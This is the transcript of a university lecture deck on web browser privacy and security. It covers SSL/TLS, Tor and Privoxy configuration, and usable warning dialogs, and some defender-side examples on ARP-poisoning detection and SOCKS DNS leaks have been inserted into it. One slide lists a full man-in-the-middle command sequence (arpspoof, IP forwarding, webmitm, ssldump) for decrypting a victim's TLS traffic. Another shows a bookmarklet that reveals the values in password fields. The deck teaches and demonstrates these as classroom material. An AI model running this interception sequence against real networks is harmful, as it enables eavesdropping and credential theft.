Web Browser Privacy and Security - PowerPoint PPT Presentation

About This Presentation
Title:

Web Browser Privacy and Security

Description:

Web Browser Privacy and Security. Dhruv Mohindra (MSISPM), Usable Privacy and Security, Spring 08 ... Expose tutorials and links so that others are satisfied ... – PowerPoint PPT presentation

Slides: 27
Provided by: ACE5188
Learn more at: http://cups.cs.cmu.edu

Transcript and Presenter's Notes

Title: Web Browser Privacy and Security


1
Web Browser Privacy and Security
Dhruv Mohindra (MSISPM), Usable Privacy and Security, Spring 08
2
Agenda
  • Web Browsing and 'The User'
  • Technology Overview
  • Security Concerns
  • Privacy Matters
  • Recent Developments
  • Suggestions

4
A Model For Informed Consent
Source: Informed Consent by Design (Friedman, Lin, Miller)
5
Agreement Revisited...
6
On the other hand...
7
But with Web Browsers...
  • None of the approaches work
    - One is too intrusive, the other too lax
  • It is a good idea to reveal simple and required features
    - The vast population just wants to browse the Internet
  • Hide complexity underneath; advanced users can find it
    - Expose tutorials and links so that others are satisfied
  • Strike a trade-off between security and usability
    - Recovering Stored Passwords in Firefox

8
Towards Better Usability...
Javascript bookmarklet (shows the contents of the password fields in the forms of the current page):

  javascript:(function() {
    var s, F, j, f, i;
    s = "";                      // collected password values
    F = document.forms;          // every form on the current page
    for (j = 0; j < F.length; ++j) {
      f = F[j];
      for (i = 0; i < f.length; ++i)   // walk the form's controls
        if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n";
    }
    if (s) alert("Passwords in forms on this page:\n\n" + s);
    else alert("There are no passwords in forms on this page.");
  })();
10
Secure Sockets Layer (SSL/TLS)
  • Set of cryptographic protocols that provide secure communications on the Internet, for applications
  • Designed to protect from eavesdropping, tampering, replay and packet forgery.
  • SSL/TLS implementations do not signify secure places but security in 'transit'.

Image Source: http://www.windowsitpro.com
12
Exercise
  • How many people feel that they are safe while browsing non-TLS (SSL)-enabled websites?
  • Have you ever questioned someone about how SSL works and how you are safe with it? Or do you take technology for granted because everyone says "Use SSL to browse securely"?

13
Demonstration
14
Man-in-the-middle Attack
Source: http://www.acm.org/crossroads/xrds11-1/gfx/figure2-wifi.jpg
15
Man-in-the-middle Attack
  • SSL/TLS can be defeated with Social Engineering
  • Run the following commands (with permission):
    - arpspoof -t victim gateway
    - arpspoof -t gateway victim
    - echo 1 > /proc/sys/net/ipv4/ip_forward
    - wireshark
    - webmitm -dd
    - ssldump -n -d -k webmitm.crt | tee ssldump.log
  • Where,
    victim is the IP address of the victim computer
    gateway is the IP address of the gateway
    (the arpspoof utility comes with the dsniff package)
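As an added defender-side example (mine, not part of the slides): a small Python check a host on the LAN could run against its own ARP table to flag the two symptoms the arpspoof demonstration above produces. The ARP output is constructed for the example, and the parser assumes the Linux/BSD `arp -an` line format.

```python
import re
from collections import defaultdict

# Constructed `arp -an` style output (not real captures). ARP_QUIET is a quiet LAN;
# ARP_SPOOFED is the same LAN while an arpspoof run has replaced the gateway's MAC.
ARP_QUIET = """\
? (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.20) at aa:bb:cc:dd:ee:01 [ether] on eth0
? (192.168.1.77) at de:ad:be:ef:00:01 [ether] on eth0
? (192.168.1.90) at <incomplete> on eth0
"""
ARP_SPOOFED = """\
? (192.168.1.1) at de:ad:be:ef:00:01 [ether] on eth0
? (192.168.1.20) at aa:bb:cc:dd:ee:01 [ether] on eth0
? (192.168.1.77) at de:ad:be:ef:00:01 [ether] on eth0
"""

ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

def parse_arp(text):
    """Map IP -> MAC from `arp -an` output; incomplete entries are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_arp_anomalies(table, gateway_ip, pinned_gateway_mac):
    """Two cheap symptoms of ARP poisoning as seen from the victim: the gateway's
    MAC differs from the pinned value, and one MAC answers for several IPs
    (the attacker poisons both sides). The second can be legitimate, e.g. a
    router with several addresses, so treat it as a lead to verify."""
    findings = []
    seen = table.get(gateway_ip)
    if seen is not None and seen != pinned_gateway_mac.lower():
        findings.append(f"gateway {gateway_ip} MAC changed: pinned "
                        f"{pinned_gateway_mac.lower()}, seen {seen}")
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims several IPs: {', '.join(sorted(ips))}")
    return findings
```

Pinning the gateway MAC out of band (from the router's label or a quiet baseline) is what makes the first check meaningful; a static ARP entry for the gateway is the matching mitigation.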

17
Anonymous Browsing
  • What constitutes anonymity on the Internet?
    - Hiding the IP address
    - Disabling exchange of cookies
    - Other personally identifiable information
  • TOR (The Onion Router)
    - Routes traffic through three mix proxies by default
    - The sender encrypts a message thrice
    - Due to layered encryption, it is called Onion Routing
    - You are safer as long as people in your anonymity set are non-identifiable
    - TOR is a SOCKS proxy and thus requires Privoxy
    - Privoxy handles http, https data and DNS lookups, then passes traffic to TOR via a SOCKS connection

18
TOR Caveats
  • False sense of completion
    - Sometimes users mistakenly feel protected while they are not
  • Using TOR without Privoxy
    - Configuring a browser to use TOR as its SOCKS proxy doesn't work due to DNS lookups/leaks
  • Execution of client-side code
    - Enabling Java, Javascript, Flash or ActiveX is very dangerous.
  • At first glance the whole system is difficult to grasp
    - No clear description of how tor, Vidalia, Privoxy work
    - No clear message that Privoxy is to run on port 8118 while TOR on 9050 (useful when configuring browser)
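
To make the DNS leak behind "Using TOR without Privoxy" concrete, an added example (mine, not the presenter's) that builds the SOCKS4 and SOCKS4a CONNECT requests a client would send to Tor's SOCKS port 9050: plain SOCKS4 only has room for an IPv4 address, so the name lookup has already gone out directly from the client, while the SOCKS4a form Privoxy uses (`forward-socks4a`) carries the hostname for the Tor exit to resolve.

```python
import socket
import struct

def socks4_connect(dest_ip, port, userid=""):
    """Plain SOCKS4 CONNECT. The format only has room for a 4-byte IPv4
    address, so the caller must already have resolved the hostname, i.e. the
    DNS query left the client directly, outside Tor: that is the leak."""
    return (struct.pack("!BBH4s", 4, 1, port, socket.inet_aton(dest_ip))
            + userid.encode("ascii") + b"\x00")

def socks4a_connect(hostname, port, userid=""):
    """SOCKS4a CONNECT. DSTIP is the marker 0.0.0.1 and the hostname follows
    the user id, so the proxy (Tor) resolves the name at the exit."""
    return (struct.pack("!BBH4s", 4, 1, port, b"\x00\x00\x00\x01")
            + userid.encode("ascii") + b"\x00"
            + hostname.encode("ascii") + b"\x00")

def resolves_locally(request):
    """True when a SOCKS4-family CONNECT carries a real address, i.e. the
    client did its own DNS lookup. SOCKS4a marks remote resolution with
    DSTIP = 0.0.0.x, x != 0."""
    vn, cd, _port, ip = struct.unpack("!BBH4s", request[:8])
    if vn != 4 or cd != 1:
        raise ValueError("not a SOCKS4/4a CONNECT request")
    return not (ip[:3] == b"\x00\x00\x00" and ip[3] != 0)

def socks4a_hostname(request):
    """Recover the hostname a SOCKS4a CONNECT asks the proxy to resolve
    (None for plain SOCKS4, where no name is present)."""
    if resolves_locally(request):
        return None
    _userid, hostname, _rest = request[8:].split(b"\x00", 2)
    return hostname.decode("ascii")
```

The same distinction applies to SOCKS5, where the client must send the hostname address type rather than resolving first; a browser pointed straight at port 9050 with a plain SOCKS setting is the configuration the slide warns about.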

19
FoxTor on Linux
  • TOR, Privoxy and FoxTor installed gracefully
    - Compiled source packages as usual and installed the Firefox extension using the web browser.
  • Configuration of Privoxy was tricky
    - The line "forward-socks4a / 127.0.0.1:9050 ." had to be added in /etc/privoxy/config. Not mentioned in docs.
    - It would be nice to have FoxTor's 'help' have these descriptions
  • Runtime Issues
    - FoxTor continues to say "You are now Masked" even when one has turned off either Privoxy or tor.
    - The user may not realize the real source of the problem and may try fiddling with FoxTor instead

21
Recent Developments
  • Context Sensitive Certificate Verification
    - Clarify relationship between user and server
    - Uses tokens and modifies web browsers
    - Displays a series of alert boxes...complicated?
    - Do you have information on removable media?
    - Are you an internal member of the Org. that owns the server?
    - Doesn't help avoid dangers with public websites
    - Denial of Service
  • Specific Password Warnings
    - Alert user while sending unencrypted passwords
    - Series of confirmation windows again...
    - User Study participants are more careful when you tell them "Do not visit websites you consider too risky"

23
Context Sensitive Dialog Boxes
24
Context Sensitive Dialog Boxes
  • Convey application or website specific risk
  • More intuitive and easy to understand
  • Users can click 'x' to dismiss anytime
  • 'Learn More' is default; curious users will click at first instinct
  • Conveys the initial meaning without any verbose statements
  • Tailor according to skill set of user; ask at browser installation time
  • Change images while adapting to user's daily usage and preferences
25
Conclusion
26
Questions